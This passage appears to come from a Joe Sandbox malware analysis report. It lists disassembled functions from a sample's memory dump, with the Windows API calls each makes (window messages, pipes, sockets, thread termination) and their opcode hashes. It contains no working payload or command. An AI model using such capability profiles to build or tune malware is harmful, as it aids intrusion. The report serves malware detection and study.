                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00263952
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 0026397C
                                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0026398D
                                                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 002639A7
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2178440468-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 14c9f5b2bd0eb238391de972386671b237fefa3d31b4c5d46e07a86280440242
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 44a33b161f02c4c7d046df48254fa94ae8cc8a8572ec29d63a881b80c2a83c9f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 14c9f5b2bd0eb238391de972386671b237fefa3d31b4c5d46e07a86280440242
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 64313430B55256AFDB21CF48EC88F6537A4FB8A710F1451A4F9018B2B1CBB0A998CF41
                                                                                                                                                                                                                                                                                                                            Function 0023808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002380D0
                                                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002380F6
                                                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 002380F9
                                                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00238117
                                                                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00238120
                                                                                                                                                                                                                                                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00238145
                                                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00238153
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 965919197c17628a2a1e2bd9bd834cb19a38e5719f664dc6f53640a72950a6aa
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 14ff24c568f1b5af3657461fd470e0ce03fe23f1e72598cdddab3b9c2474feda
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 965919197c17628a2a1e2bd9bd834cb19a38e5719f664dc6f53640a72950a6aa
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA21977661021DAFDF10DFA8DC88CBB73ECEB09360B148425F909DB290DAB0DD468760
                                                                                                                                                                                                                                                                                                                            Function 00238164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002381A9
                                                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002381CF
                                                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 002381D2
                                                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32 ref: 002381F3
                                                                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32 ref: 002381FC
                                                                                                                                                                                                                                                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00238216
                                                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00238224
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: ed52d22664cc6e6e15d0414ed2c4f528701a464cbf4e6cca7ecd3710aa80bade
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 3d1faf274c194cadeacdfe6b5ce117300ae5b276032477cf4a8e1084b9e8b34c
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ed52d22664cc6e6e15d0414ed2c4f528701a464cbf4e6cca7ecd3710aa80bade
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8221A475614249BFDB10DFA8EC88DAA77ECEB09360B108125F905CB1A0DEB0ED41C764
                                                                                                                                                                                                                                                                                                                            Function 00240E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 00240E99
                                                                                                                                                                                                                                                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00240ED5
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                                                            • String ID: nul
                                                                                                                                                                                                                                                                                                                            • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 7107dc17e6473310d5ffe1e472298e1b614b704dc92d8ae90180c8d82b4a2b6c
                                                                                                                                                                                                                                                                                                                            • Instruction ID: cff42c9783dc7bd2bae15f7c6fbfedfd384c120c478f4580d4f2d2e4d95a5fa2
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7107dc17e6473310d5ffe1e472298e1b614b704dc92d8ae90180c8d82b4a2b6c
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5021A67461030AAFDB348F25DC84A9A77E8BF54324F204A69FDA5D72D0DBB0D8A4CB50
                                                                                                                                                                                                                                                                                                                            Function 00240F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00240F6D
                                                                                                                                                                                                                                                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00240FA8
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                                                            • String ID: nul
                                                                                                                                                                                                                                                                                                                            • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 82eb093de0953a84704b48cb8c8fad62c04c31fca9f286167f64c33acfdd6291
                                                                                                                                                                                                                                                                                                                            • Instruction ID: c7fc62d281712df1747fb36d2900f8d16c5cef4842655633ae755d0b8c8a6455
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82eb093de0953a84704b48cb8c8fad62c04c31fca9f286167f64c33acfdd6291
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E21A335A1034ADBDB348F689C44A9977A8BF55720F204A19FDA1D32D0DBB198E4DB50
                                                                                                                                                                                                                                                                                                                            Function 00264B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001D78B1
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D7873: GetStockObject.GDI32(00000011), ref: 001D78C5
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 001D78CF
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00264BB0
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00264BBD
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00264BC8
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00264BD7
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00264BE3
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                                                                                                            • String ID: Msctls_Progress32
                                                                                                                                                                                                                                                                                                                            • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                                                                                                                            • Opcode ID: bdc608d58f78fc196b9955b35e4e6ae9d9fe5829ff7d2be8a1ac2a4becdeaf4a
                                                                                                                                                                                                                                                                                                                            • Instruction ID: afdbd61f3534c3a76eabfaf1fcfff569c3e68e21b26d38caa18e0f4eab013b28
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bdc608d58f78fc196b9955b35e4e6ae9d9fe5829ff7d2be8a1ac2a4becdeaf4a
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 911193B155021EBEEF119E65CC85EEB7F5DEF09758F014111F648A2090CA71DC619BA4
                                                                                                                                                                                                                                                                                                                            Function 00236078 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _memcmp
                                                                                                                                                                                                                                                                                                                            • String ID: j`#
                                                                                                                                                                                                                                                                                                                            • API String ID: 2931989736-2107346225
                                                                                                                                                                                                                                                                                                                            • Opcode ID: fd64c6453d1c1e5c6160f75daef4161b376919dfede97d161b42d4b5e17624c1
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 63acdd90d52b28396ad94df35e953df61b4965eccdb304d79d40afb440f25a5a
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd64c6453d1c1e5c6160f75daef4161b376919dfede97d161b42d4b5e17624c1
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F70179E5620709BBD6186A215C87F7B736DAE7139CF00C125FE0D9A241E7B1ED34C1A1
                                                                                                                                                                                                                                                                                                                            Function 0023E30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0023E328
                                                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000), ref: 0023E32F
                                                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0023E345
                                                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000), ref: 0023E34C
                                                                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0023E390
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 0023E36D
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                                                                                                                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                                                                                                            • API String ID: 4072794657-3128320259
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 5138f32732584fa85cf3ba061fc3bfaa95288e9edc7954445a318116f82e4479
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 5e23cf3a3059537884a1dcf95ac54c4b288df83577a772a86e045c2297598202
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5138f32732584fa85cf3ba061fc3bfaa95288e9edc7954445a318116f82e4479
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8F0112F6E1020C7FE7119BA4ED8DEE6776CD708300F418595F74AE6041E6B49E848B75
                                                                                                                                                                                                                                                                                                                            Function 00241312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,?), ref: 00241322
                                                                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000000,?), ref: 00241334
                                                                                                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000,000001F6), ref: 00241342
                                                                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00241350
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0024135F
                                                                                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 0024136F
                                                                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(00000000), ref: 00241376
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3495660284-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 2906e8c1e858a133f94eb3392dde9f6e2c44868becc672f0efce264383c3a3fe
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 7f19943bd8d31d346edea3877702c7dded1b6400fdfac39d97a8dc2df51465a8
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2906e8c1e858a133f94eb3392dde9f6e2c44868becc672f0efce264383c3a3fe
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50F03C32642A06BBD7411F54FE4DBC6BB39FF05702F505061F101918A0C7B4A8B0CF90
                                                                                                                                                                                                                                                                                                                            Function 002526BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 0025281D
                                                                                                                                                                                                                                                                                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0025283E
                                                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 0025284F
                                                                                                                                                                                                                                                                                                                            • htons.WSOCK32(?,?,?,?,?), ref: 00252938
                                                                                                                                                                                                                                                                                                                            • inet_ntoa.WSOCK32(?), ref: 002528E9
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023433E: _strlen.LIBCMT ref: 00234348
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00253C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0024F669), ref: 00253C9D
                                                                                                                                                                                                                                                                                                                            • _strlen.LIBCMT ref: 00252992
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3203458085-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 79a21959f8c8252f76aac097e8b603c13ab965350613f715e682893c1ffbd9fb
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 043822b0813a2b0aaf632599cd24690a6bd762b5e8b18dde47a84bc9dfb11afa
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79a21959f8c8252f76aac097e8b603c13ab965350613f715e682893c1ffbd9fb
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0B1D131604301EFD324DF24C885E2AB7A5AF99318F64854CF8564B3E2DB71ED4ACB91
                                                                                                                                                                                                                                                                                                                            Function 00200527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • __allrem.LIBCMT ref: 0020042A
                                                                                                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00200446
                                                                                                                                                                                                                                                                                                                            • __allrem.LIBCMT ref: 0020045D
                                                                                                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0020047B
                                                                                                                                                                                                                                                                                                                            • __allrem.LIBCMT ref: 00200492
                                                                                                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002004B0
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
